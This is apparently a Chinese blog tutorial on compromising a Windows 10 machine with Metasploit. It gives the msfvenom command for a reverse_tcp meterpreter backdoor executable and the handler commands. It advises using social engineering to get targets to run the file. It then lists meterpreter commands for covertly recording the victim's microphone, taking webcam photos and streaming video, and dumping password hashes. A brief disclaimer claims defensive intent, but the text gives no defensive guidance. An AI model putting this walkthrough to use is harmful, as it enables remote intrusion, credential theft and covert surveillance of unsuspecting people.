使用Metasploit MSFVenom远程入侵计算机

Admin 2020-01-30 241人围观 ,发现0个评论 MetasploitMSF漏洞利用

使用Metasploit MSFVenom远程入侵计算机 Web安全 第1张

当涉及到渗透和黑客攻击时,Linux就在那里。Kali Linux是功能最强大的Linux版本之一,为所有渗透测试工具提供了动力。Metasploit是最受欢迎的工具之一,可用于入侵包括计算机,Web服务器甚至手机在内的远程设备。在Metasploit的帮助下,入侵远程计算机并不难。Metasploit是终端命令库程序。对于初学者来说,很难知道命令以及如何执行它们。因此,如果您是新手,则可以学习最常见的Metasploit命令以开始使用。

注意: 向您展示黑客如何侵入远程系统以及如何防止它们。

使用Metasploit MSFVenom远程入侵计算机– Windows 10黑客

要求:

  1. Kali Linux操作系统

  2. Metasploit框架(已在Kali Linux中预构建)

  3. 目标机

黑客入侵Windows 10计算机的演示是在虚拟环境中进行的,这意味着在此过程中不会损害任何实际设备。

如果要在VirtualBox中尝试,则还需要满足以下条件:

  1. 虚拟盒子

  2. Kali Linux VM映像

  3. Windows 10虚拟映像

  4. 目标机

远程入侵计算机的步骤如下:

  • 下载并安装Kali linux。

  • 安装完成后,启动系统并进行升级。只需打开一个终端并输入以下命令:

apt-get upgrade
  • 更新后,运行metasploit。打开终端,然后键入:msfconsole。 

  • 当Metasploit开始时,第一件事就是创建一个后门。输入以下命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.5 -f exe -o /root/Desktop/AnyName.exe

使用Metasploit MSFVenom远程入侵计算机 Web安全 第2张

  • 将LHOST = 10.0.2.5替换为您的内部IP。您可以通过在终端中键入' ifconfig'进行检查。您可以将保存后门的位置更改为任意选择 我是在桌面上创建的

使用Metasploit MSFVenom远程入侵计算机 Web安全 第3张

 

  • 下一步是使用漏洞利用程序。该漏洞处理程序将处理所有后门请求。为此,只需键入以下命令。

 

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp

使用Metasploit MSFVenom远程入侵计算机 Web安全 第4张

  • 漏洞利用处理程序准备就绪后,只需设置漏洞利用选项即可。 

使用Metasploit MSFVenom远程入侵计算机 Web安全 第5张

  • 设置侦听主机IP和端口后,只需键入以下命令即可利用。

exploit -j -z

使用Metasploit MSFVenom远程入侵计算机 Web安全 第6张

  • 现在是传播后门的一部分。在这里成为一名社会工程师。只需很少的社会工程学,即可将目标安装在PC上。当有人运行您发送的后门时。会话将在您的Metasploit终端中开始,而您正在…

  • 现在该玩目标设备了。现在,您可以播放受害设备并对其执行任何操作。您可以在远程设备上执行数百种操作。以下是您可以在目标设备上执行的一些最有趣的操作。

远程操作的Meterpreter命令

record_mic

此命令提供您所连接的远程计算机的实时麦克风源。聆听目标的实时对话。

webcam_chat

它启动与目标计算机的视频聊天

webcam_snap

用于从目标设备捕获照片。

webcam_stream

用于从受害者计算机流式传输实时视频。

hashdump

它转储SAM数据库的内容。

您可以检出所有最常见的Metasploit命令和meterpreter有效负载

希望这对您有用,并使您清楚如何使用Metasploit MSFVenom远程入侵计算机。如果您遇到任何问题,请在下面发表评论。


上一篇:爆破tomcat 下一篇:HTTP Host头攻击的技术
请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By 蚁人博客